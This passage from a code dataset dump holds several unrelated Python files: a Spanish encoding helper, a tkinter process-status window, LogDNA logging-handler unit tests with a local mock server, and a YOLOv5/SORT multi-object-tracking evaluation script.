1))\r\n v1 = codifica(f, c, Nf, Nc)\r\n v2 = codifica(v1, o , Nf * Nc, No)\r\n# print(f'({f},{c},{o})->{v2}')\r\n return v2\r\n\r\ndef decodifica3(x, Nf, Nc, No):\r\n # Funcion que codifica un caracter en su respectiva fila f, columna c y objeto o\r\n # print('x : '+str(x))\r\n # print('Nf: '+str(Nf))\r\n # print('Nc: '+str(Nc))\r\n # print('No: '+str(No))\r\n v1, o = decodifica(x, Nf * Nc, No)\r\n f, c = decodifica(v1, Nf, Nc)\r\n# print(f'{x}->({f},{c},{o})')\r\n return f, c, o\r\n\r\ndef deco_dict3(I:dict,Ncuadros:int,Ncolores:int,Nturnos:int):\r\n keys = I.keys()\r\n deco_list = []\r\n for i in keys:\r\n# print(\"i : \"+i)\r\n# print('Ni: '+str(Ncuadros))\r\n# print('Nj: '+str(Ncolores))\r\n# print('Nk: '+str(Nturnos))\r\n cud,col,tur = decodifica3(ord(i)- 256,Ncuadros,Ncolores,Nturnos)\r\n lis = [cud,col,tur,I[i]]\r\n # str = \"{}-{}-{}-{}\".format(tur,cud,col,I[i])\r\n deco_list.append(lis)\r\n return deco_list\r\n","sub_path":"Main/codificacion.py","file_name":"codificacion.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307269001","text":"import tkinter as tk\nimport subprocess\n\n\nclass StatusWindow(tk.Frame):\n subprocesses = {}\n\n def create_part(self, row, title, process):\n label = tk.Label(self, text=title)\n label.grid(row=row, column=0)\n\n label = tk.Label(self, text=' ', bg='red')\n label.grid(row=row, column=1, padx=10)\n self.status[row] = label\n\n def spawn_proc(port):\n self.subprocesses[row] = subprocess.Popen(['python3', process, str(port)])\n\n button = tk.Button(self, text='Start', command=lambda: spawn_proc(self.port.get()))\n button.grid(row=row, column=2)\n\n button = tk.Button(self, text='Stop', command=lambda: self.subprocesses[row].terminate())\n button.grid(row=row, column=3)\n\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.status = {}\n\n label = tk.Label(self, text='Port:')\n label.grid(row=0, column=0)\n self.port = tk.IntVar()\n entry = tk.Entry(self, textvariable=self.port)\n entry.grid(row=0, column=1, columnspan=2)\n\n self.create_part(1, 'Driver', 'ls350driver.py')\n self.create_part(2, 'Acquirer', 'ls350acquirer.py')\n self.create_part(3, 'Data Store', 'data_store.py')\n self.create_part(4, 'Recorder', 'recorder.py')\n self.create_part(5, 'Controller', 'controller.py')\n self.create_part(6, 'Front End', 'frontend.py')\n self.check_status()\n\n def check_status(self):\n for key, proc in self.subprocesses.items():\n if proc.poll() is None:\n self.status[key].configure(background='green')\n else:\n self.status[key].configure(background='red')\n\n root.after(100, self.check_status)\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n sw = StatusWindow(root)\n root.mainloop()\n","sub_path":"instrument_example/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128853886","text":"import json\nimport unittest\n\nfrom http.server import BaseHTTPRequestHandler\nfrom logdna import LogDNAHandler\nfrom .mock.server import get_port, start_server\nfrom .mock.log import logger, info, LOGDNA_API_KEY\n\nexpectedLines = []\n\n\nclass SuccessfulRequestHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length)\n self.send_response(200)\n\n self.end_headers()\n body = json.loads(body)['ls']\n for keys in body:\n expectedLines.append(keys['line'])\n\n\nclass FailedRequestHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n self.rfile.read(content_length)\n self.send_response(400)\n self.end_headers()\n\n\nclass LogDNAHandlerTest(unittest.TestCase):\n def server_recieves_messages(self):\n port = get_port()\n options = {\n 'hostname': 'localhost',\n 'url': 'http://localhost:{0}'.format(port),\n 'ip': '10.0.1.1',\n 'mac': 'C0:FF:EE:C0:FF:EE'\n }\n\n handler = LogDNAHandler(LOGDNA_API_KEY, options)\n logger.addHandler(handler)\n line = \"python python python\"\n\n server_thread = start_server(port, SuccessfulRequestHandler)\n logdna_thread = info(line)\n\n server_thread.join()\n logdna_thread.join()\n\n self.assertEqual(len(expectedLines), 1)\n self.assertIn(line, expectedLines)\n logger.removeHandler(handler)\n\n def messages_preserved_if_excp(self):\n port = get_port()\n options = {\n 'hostname': 'localhost',\n 'url': 'http://localhost:{0}'.format(port),\n 'ip': '10.0.1.1',\n 'mac': 'C0:FF:EE:C0:FF:EE'\n }\n\n handler = LogDNAHandler(LOGDNA_API_KEY, options)\n logger.addHandler(handler)\n line = \"second test. server fails\"\n\n server_thread = start_server(port, FailedRequestHandler)\n logdna_thread = info(line)\n\n server_thread.join()\n logdna_thread.join()\n\n self.assertEqual(len(handler.buf), 1)\n logger.removeHandler(handler)\n\n def stops_retention_when_buf_is_full(self):\n port = get_port()\n options = {\n 'hostname': 'localhost',\n 'url': 'http://localhost:{0}'.format(port),\n 'ip': '10.0.1.1',\n 'mac': 'C0:FF:EE:C0:FF:EE',\n 'buf_retention_limit': 50,\n 'equest_timeout': 10,\n 'flush_interval': 1,\n 'retry_interval_secs': 1\n }\n\n handler = LogDNAHandler(LOGDNA_API_KEY, options)\n logger.addHandler(handler)\n line = \"when buffer grows bigger than we want\"\n lineTwo = \"when buffer grows bigger than we want. And more and more\"\n\n server_thread = start_server(port, FailedRequestHandler)\n logdna_thread = info(line, lineTwo)\n\n server_thread.join()\n logdna_thread.join()\n\n self.assertEqual(len(handler.buf), 1)\n self.assertNotEqual(handler.buf[0]['line'], lineTwo)\n logger.removeHandler(handler)\n\n def test_run_tests(self):\n self.server_recieves_messages()\n self.messages_preserved_if_excp()\n self.stops_retention_when_buf_is_full()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353656367","text":"##usage : python mot_eval.py\r\n\r\nfrom __future__ import print_function\r\nfrom scipy.spatial import distance as dist\r\nfrom collections import OrderedDict\r\n#import imutils\r\nimport time\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\nfrom tqdm import tqdm\r\nimport pandas as pd\r\nimport argparse\r\n\r\nfrom yolov5_inference import yolo_detector\r\nfrom utils.torch_utils import time_synchronized, select_device\r\nfrom models.experimental import attempt_load\r\n\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-w\", \"--weights\", type=str, default='best.pt', help='model.pt path(s)')\r\nap.add_argument(\"-i\", \"--img\", type=int, default= 1024, help='image size to prediction')\r\nap.add_argument(\"-d\", \"--inp\", type=str, default='input/images1', help='Input directory')\r\nap.add_argument(\"-l\", \"--lab\", type=str, default='input/labels1', help='Labels directory')\r\nargs = vars(ap.parse_args())\r\n\r\n########################\r\n####### ALERT ############\r\n########################\r\n###SELECT THIS FIRST\r\n\r\n#tracker = \"euclidean\"\r\ntracker = \"sort\"\r\n\r\n\r\nclass EuclideanTracker():\r\n \r\n def __init__(self, maxDisappeared=50): ##by default it was 50\r\n # initialize the next unique object ID along with two ordered\r\n # dictionaries used to keep track of mapping a given object\r\n # ID to its centroid and number of consecutive frames it has\r\n # been marked as \"disappeared\", respectively\r\n self.nextObjectID = 0\r\n self.objects = OrderedDict()\r\n self.boundingBoxes = OrderedDict()\r\n self.trajectory = OrderedDict()\r\n self.disappeared = OrderedDict()\r\n # store the number of maximum consecutive frames a given\r\n # object is allowed to be marked as \"disappeared\" until we\r\n # need to deregister the object from tracking\r\n self.maxDisappeared = maxDisappeared\r\n \r\n \r\n def register(self, centroid, boundingBox):\r\n # when registering an object we use the next available object\r\n # ID to store the centroid\r\n self.objects[self.nextObjectID] = centroid\r\n self.boundingBoxes[self.nextObjectID] = boundingBox\r\n self.trajectory[self.nextObjectID] = list([centroid])\r\n self.disappeared[self.nextObjectID] = 0\r\n self.nextObjectID += 1\r\n \r\n \r\n def deregister(self, objectID):\r\n # to deregister an object ID we delete the object ID from\r\n # both of our respective dictionaries\r\n del self.objects[objectID]\r\n del self.boundingBoxes[objectID]\r\n del self.trajectory[objectID]\r\n del self.disappeared[objectID]\r\n \r\n \r\n def update(self, rects):\r\n # check to see if the list of input bounding box rectangles\r\n # is empty\r\n if len(rects) == 0:\r\n # loop over any existing tracked objects and mark them\r\n # as disappeared\r\n for objectID in list(self.disappeared.keys()):\r\n self.disappeared[objectID] += 1\r\n # if we have reached a maximum number of consecutive\r\n # frames where a given object has been marked as\r\n # missing, deregister it\r\n if self.disappeared[objectID] > self.maxDisappeared:\r\n self.deregister(objectID)\r\n # return early as there are no centroids or tracking info\r\n # to update\r\n return self.objects\r\n \r\n # initialize an array of input centroids for the current frame\r\n inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\r\n # loop over the bounding box rectangles\r\n for (i, (startX, startY, endX, endY)) in enumerate(rects):\r\n # use the bounding box coordinates to derive the centroid\r\n cX = int((startX + endX) / 2.0)\r\n cY = int((startY + endY) / 2.0)\r\n inputCentroids[i] = (cX, cY)\r\n \r\n # if we are currently not tracking any objects take the input\r\n # centroids and register each of them\r\n if len(self.objects) == 0:\r\n for i in range(0, len(inputCentroids)):\r\n self.register(inputCentroids[i], rects[i])\r\n \r\n # otherwise, are are currently tracking objects so we need to\r\n # try to match the input centroids to existing object\r\n # centroids\r\n else:\r\n # grab the set of object IDs and corresponding centroids\r\n objectIDs = list(self.objects.keys())\r\n objectCentroids = list(self.objects.values())\r\n # compute the distance between each pair of object\r\n # centroids and input centroids, respectively -- our\r\n # goal will be to match an input centroid to an existing\r\n # object centroid\r\n D = dist.cdist(np.array(objectCentroids), inputCentroids)\r\n # in order to perform this matching we must (1) find the\r\n # smallest value in each row and then (2) sort the row\r\n # indexes based on their minimum values so that the row\r\n # with the smallest value is at the *front* of the index\r\n # list\r\n rows = D.min(axis=1).argsort()\r\n # next, we perform a similar process on the columns by\r\n # finding the smallest value in each column and then\r\n # sorting using the previously computed row index list\r\n cols = D.argmin(axis=1)[rows]\r\n \r\n # in order to determine if we need to update, register,\r\n # or deregister an object we need to keep track of which\r\n # of the rows and column indexes we have already examined\r\n usedRows = set()\r\n usedCols = set()\r\n # loop over the combination of the (row, column) index\r\n # tuples\r\n for (row, col) in zip(rows, cols):\r\n # if we have already examined either the row or\r\n # column value before, ignore it\r\n # val\r\n if row in usedRows or col in usedCols:\r\n continue\r\n # otherwise, grab the object ID for the current row,\r\n # set its new centroid, and reset the disappeared\r\n # counter\r\n objectID = objectIDs[row]\r\n self.objects[objectID] = inputCentroids[col]\r\n self.boundingBoxes[objectID] = rects[col]\r\n self.trajectory[objectID].append(inputCentroids[col])\r\n self.disappeared[objectID] = 0\r\n # indicate that we have examined each of the row and\r\n # column indexes, respectively\r\n usedRows.add(row)\r\n usedCols.add(col)\r\n \r\n # compute both the row and column index we have NOT yet\r\n # examined\r\n unusedRows = set(range(0, D.shape[0])).difference(usedRows)\r\n unusedCols = set(range(0, D.shape[1])).difference(usedCols)\r\n \r\n # in the event that the number of object centroids is\r\n # equal or greater than the number of input centroids\r\n # we need to check and see if some of these objects have\r\n # potentially disappeared\r\n if D.shape[0] >= D.shape[1]:\r\n # loop over the unused row indexes\r\n for row in unusedRows:\r\n # grab the object ID for the corresponding row\r\n # index and increment the disappeared counter\r\n objectID = objectIDs[row]\r\n self.disappeared[objectID] += 1\r\n # check to see if the number of consecutive\r\n # frames the object has been marked \"disappeared\"\r\n # for warrants deregistering the object\r\n if self.disappeared[objectID] > self.maxDisappeared:\r\n self.deregister(objectID)\r\n \r\n # otherwise, if the number of input centroids is greater\r\n # than the number of existing object centroids we need to\r\n # register each new input centroid as a trackable object\r\n else:\r\n for col in unusedCols:\r\n self.register(inputCentroids[col], rects[col])\r\n # return the set of trackable objects\r\n return self.objects, self.trajectory, self.boundingBoxes\r\n\r\n\r\n\r\n\r\nfrom numba import jit\r\nimport os.path\r\n\r\nfrom scipy.optimize import linear_sum_assignment\r\nimport glob\r\nimport time\r\nimport argparse\r\nfrom filterpy.kalman import KalmanFilter\r\nfrom collections import OrderedDict\r\n\r\nfrom tqdm import tqdm\r\nimport pandas as pd\r\n\r\n\r\ndef iou(bb_test,bb_gt):\r\n \"\"\"\r\n Computes IOU between two bboxes in the form [x1,y1,x2,y2]\r\n \"\"\"\r\n xx1 = np.maximum(bb_test[0], bb_gt[0])\r\n yy1 = np.maximum(bb_test[1], bb_gt[1])\r\n xx2 = np.minimum(bb_test[2], bb_gt[2])\r\n yy2 = np.minimum(bb_test[3], bb_gt[3])\r\n w = np.maximum(0., xx2 - xx1)\r\n h = np.maximum(0., yy2 - yy1)\r\n wh = w * h\r\n o = wh / ((bb_test[2]-bb_test[0])*(bb_test[3]-bb_test[1])\r\n + (bb_gt[2]-bb_gt[0])*(bb_gt[3]-bb_gt[1]) - wh)\r\n return(o)\r\n\r\ndef colinearity(det,hist):\r\n #det - current detection\r\n #hist - last 2 mean detections\r\n \r\n dims = det[2:4] - det[:2]\r\n diag = np.sqrt(sum(dims**2))\r\n a = det[:2] + dims/2 - hist[-2]\r\n b = hist[-1] - hist[-2]\r\n len1 = np.sqrt(sum(a*a))\r\n len2 = np.sqrt(sum(b*b))\r\n ratio = len2/float(len1)\r\n maxdist = diag*(min(dims)/max(dims)+1)\r\n maxval = b.dot(b)\r\n a *= ratio\r\n return a.dot(b)/float(maxval) if maxval and maxdist > len1 else 0\r\n\r\ndef convert_bbox_to_z(bbox):\r\n \"\"\"\r\n Takes a bounding box in the form [x1,y1,x2,y2] and returns z in the form\r\n [x,y,s,r] where x,y is the centre of the box and s is the scale/area and r is\r\n the aspect ratio\r\n \"\"\"\r\n w = bbox[2]-bbox[0]\r\n h = bbox[3]-bbox[1]\r\n x = bbox[0]+w/2.\r\n y = bbox[1]+h/2.\r\n s = w*h #scale is just area\r\n r = w/float(h)\r\n return np.array([x,y,s,r]).reshape((4,1))\r\n\r\ndef convert_x_to_bbox(x,score=None):\r\n \"\"\"\r\n Takes a bounding box in the centre form [x,y,s,r] and returns it in the form\r\n [x1,y1,x2,y2] where x1,y1 is the top left and x2,y2 is the bottom right\r\n \"\"\"\r\n w = np.sqrt(x[2]*x[3])\r\n h = x[2]/w\r\n if(score==None):\r\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.]).reshape((1,4))\r\n else:\r\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.,score]).reshape((1,5))\r\n \r\n\r\n\r\nclass KalmanBoxTracker(object):\r\n \"\"\"\r\n This class represents the internel state of individual tracked objects observed as bbox.\r\n \"\"\"\r\n count = 0\r\n \r\n def __init__(self,bbox):\r\n \"\"\"\r\n Initialises a tracker using initial bounding box.\r\n \"\"\"\r\n #define constant velocity model\r\n self.kf = KalmanFilter(dim_x=7, dim_z=4)\r\n self.kf.F = np.array([[1,0,0,0,1,0,0],[0,1,0,0,0,1,0],[0,0,1,0,0,0,1],[0,0,0,1,0,0,0], [0,0,0,0,1,0,0],[0,0,0,0,0,1,0],[0,0,0,0,0,0,1]])\r\n self.kf.H = np.array([[1,0,0,0,0,0,0],[0,1,0,0,0,0,0],[0,0,1,0,0,0,0],[0,0,0,1,0,0,0]])\r\n\r\n self.kf.R[2:,2:] *= 10.\r\n self.kf.P[4:,4:] *= 1000. #give high uncertainty to the unobservable initial velocities\r\n self.kf.P *= 10.\r\n self.kf.Q[-1,-1] *= 0.01\r\n self.kf.Q[4:,4:] *= 0.01\r\n\r\n self.kf.x[:4] = convert_bbox_to_z(bbox)\r\n self.time_since_update = 0\r\n self.id = KalmanBoxTracker.count\r\n KalmanBoxTracker.count += 1\r\n self.history = []\r\n self.hits = 0\r\n self.hit_streak = 0\r\n self.age = 0\r\n self.cthist = [self.kf.x[:2].ravel()]\r\n\r\n def update(self, bbox, n):\r\n \"\"\"\r\n Updates the state vector with observed bbox.\r\n \"\"\"\r\n self.time_since_update = 0\r\n self.history = []\r\n self.hits += 1\r\n self.hit_streak += 1\r\n self.kf.update(convert_bbox_to_z(bbox))\r\n self.cthist.append(bbox[:2] + (bbox[2:4] - bbox[:2]) / 2)\r\n self.cthist = self.cthist[-n:]\r\n\r\n def predict(self):\r\n \"\"\"\r\n Advances the state vector and returns the predicted bounding box estimate.\r\n \"\"\"\r\n if((self.kf.x[6]+self.kf.x[2])<=0):\r\n self.kf.x[6] *= 0.0\r\n self.kf.predict()\r\n self.age += 1\r\n if(self.time_since_update>0):\r\n self.hit_streak = 0\r\n self.kf.P *= 1.2 # we may be lost, increase uncertainty and responsiveness\r\n self.time_since_update += 1\r\n self.history.append(convert_x_to_bbox(self.kf.x))\r\n return self.history[-1]\r\n\r\n def get_state(self):\r\n \"\"\"\r\n Returns the current bounding box estimate.\r\n \"\"\"\r\n return convert_x_to_bbox(self.kf.x)\r\n \r\n\r\n \r\n \r\ndef associate_detections_to_trackers(detections, trackers, cost_fn = iou, threshold = 0.3): ##less th gives better score\r\n \"\"\"\r\n Assigns detections to tracked object (both represented as bounding boxes)\r\n Returns 3 lists of matches, unmatched_detections and unmatched_trackers\r\n \"\"\"\r\n lendet = len(detections)\r\n lentrk = len(trackers)\r\n\r\n if(lentrk==0):\r\n return np.empty((0,2),dtype=int), np.arange(lendet), np.array([],dtype=int)\r\n cost_matrix = np.zeros((lendet,lentrk),dtype=np.float32)\r\n\r\n for d,det in enumerate(detections):\r\n for t,trk in enumerate(trackers):\r\n cost_matrix[d,t] = cost_fn(det,trk)\r\n cost_matrix[cost_matrix < threshold] = 0.\r\n matched_indices = linear_sum_assignment(-cost_matrix) \r\n matched_indices = np.asarray(matched_indices)\r\n matched_indices = np.transpose(matched_indices)\r\n\r\n costs = cost_matrix[tuple(matched_indices.T)] # select values from cost matrix by matched indices\r\n matches = matched_indices[np.where(costs)[0]] # remove zero values from matches\r\n unmatched_detections = np.where(np.in1d(range(lendet), matches[:,0], invert=True))[0]\r\n unmatched_trackers = np.where(np.in1d(range(lentrk), matches[:,1], invert=True))[0]\r\n\r\n if(len(matches)==0):\r\n matches = np.empty((0,2),dtype=int)\r\n\r\n return matches, unmatched_detections, unmatched_trackers\r\n\r\n\r\n\r\nclass SortTracker(object):\r\n def __init__(self,max_age=10,min_hits=0):\r\n \"\"\"\r\n Sets key parameters for SORT\r\n \"\"\"\r\n self.max_age = max_age\r\n self.min_hits = min_hits\r\n self.trackers = []\r\n self.frame_count = 0\r\n self.trajectory = OrderedDict()\r\n\r\n def update(self, rects, cnum = 3):\r\n dets = np.array(rects)\r\n \"\"\"\r\n Params:\r\n dets - a numpy array of detections in the format [[x1,y1,x2,y2,score],[x1,y1,x2,y2,score],...]\r\n cnum - number of center positions to average\r\n Requires: this method must be called once for each frame even with empty detections.\r\n Returns the a similar array, where the last column is the object ID.\r\n NOTE: The number of objects returned may differ from the number of detections provided.\r\n \"\"\"\r\n self.frame_count += 1\r\n #get predicted locations from existing trackers.\r\n trks = np.zeros((len(self.trackers),5))\r\n ctmean = []\r\n to_del = []\r\n ret = []\r\n \r\n for t,trk in enumerate(trks):\r\n pos = self.trackers[t].predict()[0]\r\n trk[:] = [pos[0], pos[1], pos[2], pos[3], 0]\r\n if(np.any(np.isnan(pos))):\r\n to_del.append(t)\r\n trks = np.ma.compress_rows(np.ma.masked_invalid(trks))\r\n #for t in reversed(to_del):\r\n for t in iter(to_del):\r\n self.trackers.pop(t)\r\n matched, unmatched_dets, unmatched_trks = associate_detections_to_trackers(dets,trks)\r\n\r\n for t in unmatched_trks:\r\n cnt = np.array(self.trackers[t].cthist)\r\n cnt = np.array([np.convolve(cnt[:,i], np.ones((cnum,))/cnum, mode='valid') for i in (0,1)]).T\r\n if cnt.shape[0] == 1: # fix same len\r\n cnt = np.concatenate((cnt,cnt),axis=0)\r\n ctmean.append(cnt)\r\n\r\n rematch, new_dets, lost_trks = associate_detections_to_trackers(dets[unmatched_dets],ctmean,colinearity,0.6)\r\n rematch = np.array([unmatched_dets[rematch[:,0]], unmatched_trks[rematch[:,1]]]).T\r\n matched = np.concatenate((matched, rematch.reshape(-1,2)))\r\n unmatched_dets = unmatched_dets[new_dets]\r\n unmatched_trks = unmatched_trks[lost_trks]\r\n\r\n #update matched trackers with assigned detections\r\n for t,trk in enumerate(self.trackers):\r\n if(t not in unmatched_trks):\r\n d = matched[np.where(matched[:,1]==t)[0],0]\r\n trk.update(dets[d,:][0], cnum+1)\r\n\r\n #create and initialise new trackers for unmatched detections\r\n for i in unmatched_dets:\r\n trk = KalmanBoxTracker(dets[i,:]) \r\n self.trackers.append(trk)\r\n i = len(self.trackers)\r\n for trk in reversed(self.trackers):\r\n #for trk in iter(self.trackers): #don't work\r\n d = trk.get_state()[0]\r\n if((trk.time_since_update < self.max_age) and (trk.hit_streak >= self.min_hits or self.frame_count <= self.min_hits)):\r\n ret.append(np.concatenate((d,[trk.id+1],[trk.time_since_update])).reshape(1,-1)) # +1 as MOT benchmark requires positive\r\n i -= 1\r\n #remove dead tracklet\r\n if(trk.time_since_update > self.max_age):\r\n self.trackers.pop(i)\r\n \r\n \r\n return_trackers = np.concatenate(ret)\r\n current_objects = OrderedDict()\r\n current_trajectory = OrderedDict()\r\n current_boundingBoxes = OrderedDict()\r\n \r\n for d in return_trackers:\r\n d = d.astype(np.int32)\r\n centroid = [int((d[0] + d[2]) / 2), int((d[1] + d[3]) / 2)]\r\n ID = d[4]\r\n current_objects[ID] = centroid\r\n current_boundingBoxes[ID] = d[0:4]\r\n \r\n try:\r\n self.trajectory[ID].append(centroid)\r\n except:\r\n self.trajectory[ID] = list([centroid])\r\n current_trajectory[ID] = self.trajectory[ID]\r\n \r\n return current_objects, current_trajectory, current_boundingBoxes \r\n\r\n\r\n# Get the bounding boxes for an image file\r\ndef get_bb(image_labels, image_file):\r\n label = pd.read_table(image_labels[image_file], delim_whitespace=True,\r\n names=('~', 'x', 'y', 'w', 'h'),\r\n dtype={'~': np.uint8, 'x': np.float32, 'y': np.float32, 'w': np.float32,\r\n 'h': np.float32})\r\n label = label.drop('~', axis=1)\r\n return label\r\n\r\n# Convert centroid and height-width bb format to initial and endpoint format\r\ndef cvt_bb(label):\r\n rect = []\r\n for car_no in range(len(label)):\r\n startX = label['x'][car_no] - label['w'][car_no]/2\r\n startY = label['y'][car_no] - label['h'][car_no]/2\r\n endX = label['x'][car_no] + label['w'][car_no]/2\r\n endY = label['y'][car_no] + label['h'][car_no]/2\r\n \r\n rect.append((startX, startY, endX, endY))\r\n return rect\r\n\r\n# Draw all the boundingboxes on Image\r\ndef draw_bb(img, label):\r\n height, width = img.shape[0], img.shape[1]\r\n\r\n for car_no in range(len(label)):\r\n x = int(label['x'][car_no] * width)\r\n y = int(label['y'][car_no] * height)\r\n w = int(label['w'][car_no] * width / 2)\r\n h = int(label['h'][car_no] * height / 2)\r\n\r\n cv2.rectangle(img, (x - w, y - h), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n return img\r\n\r\n\r\n\r\n\r\n#dataset_dir = \"input\"\r\n\r\n#images_dir = dataset_dir + \"/images1\"\r\n#labels_dir = dataset_dir + \"/labels1\"\r\n\r\nimages_dir = args[\"inp\"]\r\nlabels_dir = args[\"lab\"]\r\n\r\nimage_labels = {}\r\n\r\n\r\nfor img in glob.glob(images_dir + \"/*.jpg\", recursive=True):\r\n label = img.replace(images_dir, labels_dir)\r\n label = label.replace(\".jpg\", \".txt\")\r\n image_labels[img] = label\r\n\r\nimages = list(image_labels.keys())\r\nlist.sort(images)\r\n\r\nprint(\"Total images: \" + str(len(image_labels)))\r\n\r\n\r\n\r\n\r\n\r\n'''\r\n# dataset_dir = \"../../Dataset/fisheye-day-30072020\"\r\n\r\n# images_dir = dataset_dir + \"/images\"\r\n# labels_dir = dataset_dir + \"/labels\"\r\n\r\n# sequence = \"01_fisheye_day\"\r\n\r\n# image_labels = {}\r\n\r\n\r\n# for img in glob.glob(images_dir + \"/*.jpg\", recursive=True):\r\n# label = img.replace(images_dir, labels_dir)\r\n# label = label.replace(\".jpg\", \".txt\")\r\n# if sequence in img:\r\n# image_labels[img] = label\r\n\r\n# images = list(image_labels.keys())\r\n# list.sort(images)\r\n\r\n# print(\"Total images: \" + str(len(image_labels)))\r\n'''\r\n\r\ndef gt_generator(tracker, tracking_GT_dir):\r\n if tracker == \"euclidean\":\r\n mot_tracker = EuclideanTracker()\r\n elif tracker == \"sort\":\r\n mot_tracker = SortTracker(max_age = 10, min_hits=6) #create instance of the SORT tracker\r\n \r\n ###Getting GT\r\n #tracking_GT_dir = \"input/fisheye_day_tracking\"\r\n \r\n if not os.path.exists(tracking_GT_dir):\r\n os.mkdir(tracking_GT_dir)\r\n \r\n \r\n frame = cv2.imread(images[0])\r\n (H, W) = frame.shape[:2]\r\n \r\n # loop over the frames from the video stream\r\n for i in tqdm(range(len(image_labels))):\r\n # read the next frame from the video stream and resize it\r\n image_file = images[i]\r\n label = get_bb(image_labels, image_file)\r\n rects = cvt_bb(label) * np.array([W, H, W, H])\r\n \r\n objects, _ , boundingBoxes = mot_tracker.update(rects)\r\n \r\n output_table = np.zeros((len(objects), 5), dtype=int)\r\n idx = 0\r\n \r\n for (objectID, centroid) in objects.items():\r\n output_table[idx, 0] = objectID\r\n output_table[idx, 1:5] = boundingBoxes[objectID].astype(int)\r\n idx += 1\r\n \r\n filename = image_labels[image_file].replace(labels_dir, tracking_GT_dir)\r\n np.savetxt(filename, output_table, fmt='%d')\r\n \r\n del mot_tracker\r\n print(\"Done with GT\")\r\n\r\n\r\ndef det_generator(tracker, tracking_detection_dir):\r\n if tracker == \"euclidean\":\r\n mot_tracker1 = EuclideanTracker()\r\n elif tracker == \"sort\":\r\n mot_tracker1 = SortTracker(max_age = 10, min_hits=6) #create instance of the SORT tracker\r\n \r\n ####detection\r\n \r\n #tracking_detection_dir = \"input/fisheye_day_detection\"\r\n \r\n if not os.path.exists(tracking_detection_dir):\r\n os.mkdir(tracking_detection_dir)\r\n \r\n #mot_tracker1 = SortTracker() #create instance of the tracker\r\n \r\n \r\n frame = cv2.imread(images[0])\r\n (H, W) = frame.shape[:2]\r\n \r\n \r\n weights = args[\"weights\"]\r\n device = select_device('')\r\n half = device.type != 'cpu' # half precision only supported on CUDA\r\n model = attempt_load(weights, map_location=device) # load FP32 model ##here model checks whether one model or ensemble of models will be loaded\r\n \r\n yolo = yolo_detector(model, device, half)\r\n \r\n \r\n # loop over the frames from the video stream\r\n for i in tqdm(range(len(image_labels))):\r\n \r\n image_file = images[i]\r\n #label = get_bb(image_labels, image_file)\r\n #rects = cvt_bb(label) * np.array([W, H, W, H])\r\n \r\n image_size = args[\"img\"]\r\n rects , frame = yolo.infer_on_single_img(image_file, image_size)\r\n if tracker == \"sort\":\r\n rects = np.array(rects)\r\n \r\n objects, _ , boundingBoxes = mot_tracker1.update(rects)\r\n \r\n output_table = np.zeros((len(objects), 5), dtype=int)\r\n idx = 0\r\n \r\n for (objectID, centroid) in objects.items():\r\n output_table[idx, 0] = objectID\r\n output_table[idx, 1:5] = boundingBoxes[objectID].astype(int)\r\n idx += 1\r\n \r\n filename = image_labels[image_file].replace(labels_dir, tracking_detection_dir)\r\n np.savetxt(filename, output_table, fmt='%d')\r\n \r\n del mot_tracker1\r\n print(\"Done Detection\")\r\n\r\n\r\ntracking_detection_dir = \"input/fisheye_day_detection\"\r\ntracking_GT_dir = \"input/fisheye_day_tracking\"\r\n\r\ngt_generator(tracker, tracking_GT_dir)\r\ndet_generator(tracker, tracking_detection_dir)\r\n\r\n\r\nimport motmetrics as mm\r\n\r\ndef get_bb_with_ID(filename):\r\n lb = pd.read_table(filename, delim_whitespace=True,\r\n names=('ID', 'x1', 'y1', 'x2', 'y2'),\r\n dtype={'ID': np.uint16, 'x1': np.uint16, 'y1': np.uint16,\r\n 'x2': np.uint16, 'y2': np.uint16})\r\n \r\n BBs = np.zeros((len(lb), 4), dtype=int)\r\n \r\n\r\n IDs = np.array(lb['ID'][:])\r\n BBs[:, 0] = lb['x1'][:]\r\n BBs[:, 1] = lb['y1'][:]\r\n BBs[:, 2] = lb['x2'][:]\r\n BBs[:, 3] = lb['y2'][:]\r\n \r\n return IDs, BBs\r\n\r\n\r\ndef evaluate_tracking(tracking_GT_dir, tracking_detection_dir):\r\n detection_files = glob.glob(tracking_detection_dir + \"/*.txt\", recursive=True)\r\n list.sort(detection_files)\r\n \r\n # Create an accumulator that will be updated during each frame\r\n acc = mm.MOTAccumulator(auto_id=True)\r\n \r\n for i in tqdm(range(len(detection_files))):\r\n det_file = detection_files[i]\r\n gt_file = det_file.replace(tracking_detection_dir, tracking_GT_dir)\r\n \r\n detector_hypotheses, detector_bbs = get_bb_with_ID(det_file)\r\n gt_objects, gt_bbs = get_bb_with_ID(gt_file)\r\n \r\n distances = mm.distances.iou_matrix(gt_bbs, detector_bbs, max_iou=0.5)\r\n \r\n # Call update once for per frame. For now, assume distances between\r\n # frame objects / hypotheses are given.\r\n acc.update(\r\n gt_objects, # Ground truth objects in this frame\r\n detector_hypotheses, # Detector hypotheses in this frame\r\n distances # Distances from GT to hypotheses\r\n )\r\n\r\n \r\n mh = mm.metrics.create()\r\n summary = mh.compute(\r\n acc,\r\n metrics=mm.metrics.motchallenge_metrics, #metrics=['num_frames', 'mota', 'motp']\r\n name='overall'\r\n )\r\n\r\n strsummary = mm.io.render_summary(\r\n summary,\r\n formatters=mh.formatters,\r\n namemap=mm.io.motchallenge_metric_names\r\n )\r\n print(strsummary)\r\n \r\n return strsummary\r\n\r\n#tracking_detection_dir = 